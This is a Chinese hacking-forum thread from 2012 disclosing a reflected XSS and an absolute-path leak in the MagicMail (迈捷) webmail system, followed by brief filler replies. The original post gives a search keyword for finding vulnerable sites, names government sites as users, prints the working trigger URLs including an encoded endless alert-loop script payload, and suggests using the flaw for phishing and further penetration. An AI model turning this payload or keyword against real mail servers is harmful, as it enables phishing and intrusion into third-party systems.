123下一页
返回列表 发新帖回复
查看: 2615|回复: 25

迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
发表于 2012-11-10 02:34:31 | 显示全部楼层 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
包含  一个反射性XSS  以及  绝对路径泄漏
看了看 貌似全部是linux的。

关键字:迈捷邮件系统 by MagicMail

可以看到很多政府网站都用这个邮件系统

绝对路径 http://madman.in/index.php?login_type=declare&language=

XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E


虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等

修复方案:看官方补丁吧。
[/td][/tr]
[/table]
邮件系统
回复

使用道具 举报

发表于 2012-11-21 19:53:44 | 显示全部楼层
不错,看看。  
回复 支持 反对

使用道具 举报

发表于 2012-11-23 20:00:48 | 显示全部楼层
我十目一行也还是看不懂啊  
回复 支持 反对

使用道具 举报

chenlyun1314 该用户已被删除
发表于 2012-11-23 23:19:27 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

大伟
发表于 2014-11-4 22:25:38 | 显示全部楼层
我想要`~  
回复 支持 反对

使用道具 举报

发表于 2014-11-17 18:22:56 | 显示全部楼层
好贴子不多啊  
回复 支持 反对

使用道具 举报

发表于 2014-12-5 05:17:17 | 显示全部楼层
楼上的话等于没说~~~  
回复 支持 反对

使用道具 举报

发表于 2014-12-28 10:23:10 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

发表于 2015-1-28 06:36:48 | 显示全部楼层
牛牛牛牛  
回复 支持 反对

使用道具 举报

发表于 2015-3-2 04:47:00 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

下一页 »
123下一页
返回列表 发新帖 回复
高级模式
B Color Image Link Quote Code Smilies

本版积分规则